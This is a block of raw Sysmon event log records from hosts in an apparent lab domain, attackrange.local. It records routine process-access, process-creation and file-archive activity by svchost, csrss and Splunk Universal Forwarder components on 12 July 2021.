07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F441-60EB-6779-00000000D001}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F441-60EB-6779-00000000D001}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-F441-60EB-6779-00000000D001}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.278{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D43C138D22B9EC33AE6854270108BBB,SHA256=D53498324C1AAFB740B193B4254CAEEFAA8A402BC3D1C95D73A180DEB3A5B87E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.278{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF6A41A543839494246A28B65C9C3813,SHA256=C5BDBA0769A8310A27E2C18B5EBF3850CBFC401169CCA8A35E376C7136DA427F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.982{0C1E0330-F442-60EB-6979-00000000D001}9241052C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F442-60EB-6979-00000000D001}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.747{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.747{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.747{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F442-60EB-6979-00000000D001}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.747{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F442-60EB-6979-00000000D001}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.748{0C1E0330-F442-60EB-6979-00000000D001}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.700{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7F4B8F306CC2AE2A001E9C17F27FA04,SHA256=AD01F00528E151F34263EDB9385F3D3FE1C76DA5C1F8C6E77A63215804EE3A10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:26.135{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94467A0D27E4487FC05EC0EDDD3987B6,SHA256=33BF2649487F413EADFD871DBA5EBB4FDD92E98A1F9D99E12DD0BB5C5BECE0E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.419{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D43C138D22B9EC33AE6854270108BBB,SHA256=D53498324C1AAFB740B193B4254CAEEFAA8A402BC3D1C95D73A180DEB3A5B87E,IMPHASH=00000000000000000000000000000000falsetrue 